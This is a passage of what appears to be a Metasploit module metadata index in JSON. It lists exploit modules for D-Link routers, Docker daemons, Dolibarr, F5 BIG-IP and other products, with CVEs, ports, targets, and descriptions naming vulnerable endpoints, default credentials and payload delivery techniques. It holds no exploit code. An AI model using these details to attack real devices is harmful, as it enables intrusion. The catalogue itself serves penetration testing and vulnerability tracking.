"description": "The D-Link DCS-930L Network Video Camera is vulnerable\n to OS Command Injection via the web interface. The vulnerability\n exists at /setSystemCommand, which is accessible with credentials.\n This vulnerability was present in firmware version 2.01 and fixed\n by 2.12.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
23,
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"telnet",
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dcs_930l_authenticated_remote_command_execution",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_diagnostic_exec_noauth": {
"name": "D-Link DIR-645 / DIR-815 diagnostic.php Command Execution",
"full_name": "exploit/linux/http/dlink_diagnostic_exec_noauth",
"rank": 600,
"disclosure_date": "2013-03-05",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some D-Link Routers are vulnerable to OS Command injection in the web interface.\n On DIR-645 versions prior to 1.03 authentication isn't needed to exploit it. On\n version 1.03 authentication is needed in order to trigger the vulnerability, which\n has been definitively fixed in version 1.04. Other D-Link products, like DIR-300 rev B\n and DIR-600, are also affected by this vulnerability. Not every device includes\n wget which we need for deploying our payload. On such devices you could use the cmd\n generic payload and try to start telnetd or execute other commands. Since it is a\n blind OS command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes. This module has been tested successfully\n on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the\n vulnerability.",
"references": [
"CVE-2014-100005",
"OSVDB-92144",
"BID-58938",
"EDB-24926",
"URL-http://www.s3cur1ty.de/m1adv2013-017"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_diagnostic_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dir300_exec_telnet": {
"name": "D-Link Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/dlink_dir300_exec_telnet",
"rank": 600,
"disclosure_date": "2013-04-22",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Various D-Link Routers are vulnerable to OS command injection via the web\n interface. The vulnerability exists in tools_vct.xgi, which is accessible with\n credentials. According to the vulnerability discoverer, more D-Link devices may\n be affected.",
"references": [
"OSVDB-92698",
"EDB-25024",
"BID-59405",
"URL-http://www.s3cur1ty.de/m1adv2013-014"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir300_exec_telnet",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_dir605l_captcha_bof": {
"name": "D-Link DIR-605L Captcha Handling Buffer Overflow",
"full_name": "exploit/linux/http/dlink_dir605l_captcha_bof",
"rank": 0,
"disclosure_date": "2012-10-08",
"type": "exploit",
"author": [
"Craig Heffner",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on D-Link DIR-605L routers. The\n vulnerability exists while handling user supplied captcha information, and is due to the\n insecure usage of sprintf on the getAuthCode() function. This module has been tested\n successfully on D-Link DIR-605L firmware 1.13 (emulated) and firmware 1.12 (real).",
"references": [
"OSVDB-86824",
"URL-http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"D-Link DIR-605L 1.13"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir605l_captcha_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dir615_up_exec": {
"name": "D-Link DIR615h OS Command Injection",
"full_name": "exploit/linux/http/dlink_dir615_up_exec",
"rank": 600,
"disclosure_date": "2013-02-07",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some D-Link Routers are vulnerable to an authenticated OS command injection on\n their web interface, where default credentials are admin/admin or admin/password.\n Since it is a blind OS command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. This module was tested against\n a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a\n controlled system could be used for testing purposes. The exploit uses the wget\n client from the device to convert the command injection into an arbitrary payload\n execution.",
"references": [
"BID-57882",
"EDB-24477",
"OSVDB-90174",
"URL-http://www.s3cur1ty.de/m1adv2013-008"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dir615_up_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir615_up_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dlink_dir850l_unauth_exec": {
"name": "DIR-850L (Un)authenticated OS Command Exec",
"full_name": "exploit/linux/http/dlink_dir850l_unauth_exec",
"rank": 600,
"disclosure_date": "2017-08-09",
"type": "exploit",
"author": [
"Mumbai",
"Zdenda"
],
"description": "This module leverages an unauthenticated credential disclosure\n vulnerability to then execute arbitrary commands on DIR-850L routers\n as an authenticated user. Unable to use Meterpreter payloads.",
"references": [
"URL-https://www.seebug.org/vuldb/ssvid-96333",
"URL-https://blogs.securiteam.com/index.php/archives/3310"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-10 18:15:22 +0000",
"path": "/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dir850l_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dsl2750b_exec_noauth": {
"name": "D-Link DSL-2750B OS Command Injection",
"full_name": "exploit/linux/http/dlink_dsl2750b_exec_noauth",
"rank": 500,
"disclosure_date": "2016-02-05",
"type": "exploit",
"author": [
"p <p@ql>",
"Marcin Bury <marcin@threat9.com>"
],
"description": "This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.\n The vulnerability can be exploited through the \"cli\" parameter, which is directly used to invoke\n the \"ayecli\" binary. Vulnerable firmware versions are from 1.01 up to 1.03.",
"references": [
"PACKETSTORM-135706",
"URL-https://seclists.org/fulldisclosure/2016/Feb/53",
"URL-http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsbe Payload",
"Linux mipsel Payload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dsl2750b_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dspw110_cookie_noauth_exec": {
"name": "D-Link Cookie Command Execution",
"full_name": "exploit/linux/http/dlink_dspw110_cookie_noauth_exec",
"rank": 300,
"disclosure_date": "2015-06-12",
"type": "exploit",
"author": [
"Peter Adkins <peter.adkins@kernelpicnic.net>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote upload and code execution vulnerability on different\n D-Link devices. The vulnerability is a command injection in the cookie handling process of the\n lighttpd web server when handling specially crafted cookie values. This module has been\n successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.",
"references": [
"URL-https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dspw110_cookie_noauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_dspw215_info_cgi_bof": {
"name": "D-Link info.cgi POST Request Buffer Overflow",
"full_name": "exploit/linux/http/dlink_dspw215_info_cgi_bof",
"rank": 300,
"disclosure_date": "2014-05-22",
"type": "exploit",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on different D-Link\n devices. The vulnerability is a stack based buffer overflow in the my_cgi.cgi component,\n when handling specially crafted POST HTTP requests addressed to the /common/info.cgi\n handler. This module has been successfully tested on D-Link DSP-W215 in an emulated\n environment.",
"references": [
"OSVDB-108249",
"URL-http://www.devttys0.com/2014/05/hacking-the-dspw215-again/"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"D-Link DSP-W215 - v1.02"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_dspw215_info_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hedwig_cgi_bof": {
"name": "D-Link hedwig.cgi Buffer Overflow in Cookie Header",
"full_name": "exploit/linux/http/dlink_hedwig_cgi_bof",
"rank": 300,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Roberto Paleari",
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on several D-Link\n routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with\n long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600\n and the DIR645A1_FW103B11 firmware.",
"references": [
"OSVDB-95950",
"EDB-27283",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
"URL-http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
"URL-http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hedwig_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hnap_bof": {
"name": "D-Link HNAP Request Remote Buffer Overflow",
"full_name": "exploit/linux/http/dlink_hnap_bof",
"rank": 300,
"disclosure_date": "2014-05-15",
"type": "exploit",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an anonymous remote code execution vulnerability on different\n D-Link devices. The vulnerability is due to a stack based buffer overflow while\n handling malicious HTTP POST requests addressed to the HNAP handler. This module\n has been successfully tested on D-Link DIR-505 in an emulated environment.",
"references": [
"CVE-2014-3936",
"BID-67651",
"URL-http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"D-Link DSP-W215 - v1.0",
"D-Link DIR-505 - v1.06",
"D-Link DIR-505 - v1.07"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hnap_header_exec_noauth": {
"name": "D-Link Devices HNAP SOAPAction-Header Command Execution",
"full_name": "exploit/linux/http/dlink_hnap_header_exec_noauth",
"rank": 300,
"disclosure_date": "2015-02-13",
"type": "exploit",
"author": [
"Samuel Huntley",
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on a DIR-645 device.\n The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,\n DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB, DIR-815 revB, DIR-300 revB,\n DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR",
"references": [
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051",
"URL-http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_header_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_hnap_login_bof": {
"name": "Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow",
"full_name": "exploit/linux/http/dlink_hnap_login_bof",
"rank": 600,
"disclosure_date": "2016-11-07",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which\n is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol,\n which accepts arbitrarily long strings into certain XML parameters and then copies them into\n the stack.\n This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested\n using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and\n this vulnerability is present in both MIPS and ARM devices.\n The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a\n few load and store instructions. Because of this the payloads have to be sent unencoded, which\n can cause them to fail, although the bind shell seems to work well.\n For the ARM devices, the inline reverse tcp seems to work best.\n Check the reference links to see the vulnerable firmware versions.",
"references": [
"CVE-2016-6563",
"US-CERT-VU-677427",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt",
"URL-https://seclists.org/fulldisclosure/2016/Nov/38"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dlink DIR-818 / 822 / 823 / 850 [MIPS]",
"Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/dlink_hnap_login_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_hnap_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dlink_upnp_exec_noauth": {
"name": "D-Link Devices UPnP SOAP Command Execution",
"full_name": "exploit/linux/http/dlink_upnp_exec_noauth",
"rank": 300,
"disclosure_date": "2013-07-05",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on DIR-865 and DIR-645 devices.",
"references": [
"CVE-2014-8361",
"OSVDB-94924",
"BID-61005",
"EDB-26664",
"URL-http://www.s3cur1ty.de/m1adv2013-020"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/dlink_upnp_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dnalims_admin_exec": {
"name": "dnaLIMS Admin Module Command Execution",
"full_name": "exploit/linux/http/dnalims_admin_exec",
"rank": 600,
"disclosure_date": "2017-03-08",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"flakey_biscuit <nicholas@shorebreaksecurity.com>"
],
"description": "This module utilizes an administrative module which allows for\n command execution. This page is completely unprotected from any\n authentication when given a POST request.",
"references": [
"CVE-2017-6526",
"US-CERT-VU-929263",
"URL-https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dnalims_admin_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dnalims_admin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/docker_daemon_tcp": {
"name": "Docker Daemon - Unprotected TCP Socket Exploit",
"full_name": "exploit/linux/http/docker_daemon_tcp",
"rank": 600,
"disclosure_date": "2017-07-25",
"type": "exploit",
"author": [
"Martin Pizala"
],
"description": "Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp\n with tls but without tls-auth), an attacker can create a Docker\n container with the '/' path mounted with read/write permissions on the\n host server that is running the Docker container. As the Docker\n container executes commands as uid 0 it is honored by the host operating\n system allowing the attacker to edit/create files owned by root. This\n exploit abuses this to create a cron job in the '/etc/cron.d/' path of\n the host server.\n\n The Docker image should exist on the target system or be a valid image\n from hub.docker.com.",
"references": [
"URL-https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface",
"URL-https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket"
],
"platform": "",
"arch": "",
"rport": 2375,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux x64",
"Python"
],
"mod_time": "2017-11-15 15:14:58 +0000",
"path": "/modules/exploits/linux/http/docker_daemon_tcp.rb",
"is_install_path": true,
"ref_name": "linux/http/docker_daemon_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/dolibarr_cmd_exec": {
"name": "Dolibarr ERP/CRM Post-Auth OS Command Injection",
"full_name": "exploit/linux/http/dolibarr_cmd_exec",
"rank": 600,
"disclosure_date": "2012-04-06",
"type": "exploit",
"author": [
"Nahuel Grisolia <nahuel@cintainfinita.com.ar>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Dolibarr ERP/CRM 3's\n backup feature. This software is used to manage a company's business\n information such as contacts, invoices, orders, stocks, agenda, etc.\n When processing a database backup request, the export.php function\n does not check the input given to the sql_compat parameter, which allows\n a remote authenticated attacker to inject system commands into it,\n and then gain arbitrary code execution.",
"references": [
"OSVDB-80980",
"URL-https://seclists.org/fulldisclosure/2012/Apr/78"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dolibarr 3.1.1 on Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/dolibarr_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/dolibarr_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/dreambox_openpli_shell": {
"name": "OpenPLI Webif Arbitrary Command Execution",
"full_name": "exploit/linux/http/dreambox_openpli_shell",
"rank": 500,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command\n injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means\n that you will not see any output of your command. A ping command can be used for\n testing the vulnerability. This module has been tested on a box with the following\n features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1\n Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware\n 1.06 and Web Interface 6.0.4-Expert (PLi edition).",
"references": [
"OSVDB-90230",
"BID-57943",
"EDB-24498",
"URL-http://openpli.org/wiki/Webif",
"URL-http://www.s3cur1ty.de/m1adv2013-007"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/dreambox_openpli_shell.rb",
"is_install_path": true,
"ref_name": "linux/http/dreambox_openpli_shell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/efw_chpasswd_exec": {
"name": "Endian Firewall Proxy Password Change Command Injection",
"full_name": "exploit/linux/http/efw_chpasswd_exec",
"rank": 600,
"disclosure_date": "2015-06-28",
"type": "exploit",
"author": [
"Ben Lincoln"
],
"description": "This module exploits an OS command injection vulnerability in a\n web-accessible CGI script used to change passwords for locally-defined\n proxy user accounts. Valid credentials for such an account are\n required.\n\n Command execution will be in the context of the \"nobody\" account, but\n this account had broad sudo permissions, including to run the script\n /usr/local/bin/chrootpasswd (which changes the password for the Linux\n root account on the system to the value specified by console input\n once it is executed).\n\n The password for the proxy user account specified will *not* be\n changed by the use of this module, as long as the target system is\n vulnerable to the exploit.\n\n Very early versions of Endian Firewall (e.g. 1.1 RC5) require\n HTTP basic auth credentials as well to exploit this vulnerability.\n Use the USERNAME and PASSWORD advanced options to specify these values\n if required.\n\n Versions >= 3.0.0 still contain the vulnerable code, but it appears to\n never be executed due to a bug in the vulnerable CGI script which also\n prevents normal use (http://jira.endian.com/browse/UTM-1002).\n\n Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug\n (http://bugs.endian.com/print_bug_page.php?bug_id=3083).\n\n Tested successfully against the following versions of EFW Community:\n\n 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.\n\n Should function against any version from 1.1 RC5 to 2.2.x, as well as\n 2.4.1 and 2.5.x.",
"references": [
"CVE-2015-5082",
"URL-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082",
"EDB-37426",
"EDB-37428"
],
"platform": "Linux",
"arch": "",
"rport": 10443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/efw_chpasswd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/efw_chpasswd_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/empire_skywalker": {
"name": "PowerShellEmpire Arbitrary File Upload (Skywalker)",
"full_name": "exploit/linux/http/empire_skywalker",
"rank": 600,
"disclosure_date": "2016-10-15",
"type": "exploit",
"author": [
"Spencer McIntyre",
"Erik Daguerre"
],
"description": "A vulnerability existed in the PowerShellEmpire server prior to commit\n f030cf62 which would allow an arbitrary file to be written to an\n attacker controlled location with the permissions of the Empire server.\n\n This exploit will write the payload to /tmp/ directory followed by a\n cron.d file to execute the payload.",
"references": [
"URL-http://www.harmj0y.net/blog/empire/empire-fails/"
],
"platform": "Linux,Python",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Python",
"Linux x86",
"Linux x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/linux/http/empire_skywalker.rb",
"is_install_path": true,
"ref_name": "linux/http/empire_skywalker",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_linux/http/esva_exec": {
"name": "E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",
"full_name": "exploit/linux/http/esva_exec",
"rank": 600,
"disclosure_date": "2012-08-16",
"type": "exploit",
"author": [
"iJoo",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in E-Mail Security\n Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary\n OS commands without authentication. This module has been successfully tested on the\n ESVA_2057 appliance.",
"references": [
"OSVDB-85462",
"BID-55050",
"EDB-20551"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ESVA_2057"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/esva_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/esva_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/f5_icall_cmd": {
"name": "F5 iControl iCall::Script Root Command Execution",
"full_name": "exploit/linux/http/f5_icall_cmd",
"rank": 600,
"disclosure_date": "2015-09-03",
"type": "exploit",
"author": [
"tom",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module exploits an authenticated privilege escalation\n vulnerability in the iControl API on the F5 BIG-IP LTM (and likely\n other F5 devices). This requires valid credentials and the Resource\n Administrator role. The exploit should work on BIG-IP 11.3.0\n - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references\n for more details)",
"references": [
"CVE-2015-3628",
"URL-https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html",
"URL-https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"F5 BIG-IP LTM 11.x"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/f5_icall_cmd.rb",
"is_install_path": true,
"ref_name": "linux/http/f5_icall_cmd",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/f5_icontrol_exec": {
"name": "F5 iControl Remote Root Command Execution",
"full_name": "exploit/linux/http/f5_icontrol_exec",
"rank": 600,
"disclosure_date": "2013-09-17",
"type": "exploit",
"author": [
"bperry"
],
"description": "This module exploits an authenticated remote command execution\n vulnerability in the F5 BIGIP iControl API (and likely other\n F5 devices).",
"references": [
"CVE-2014-2928",
"URL-http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"F5 iControl"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/f5_icontrol_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/f5_icontrol_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/foreman_openstack_satellite_code_exec": {
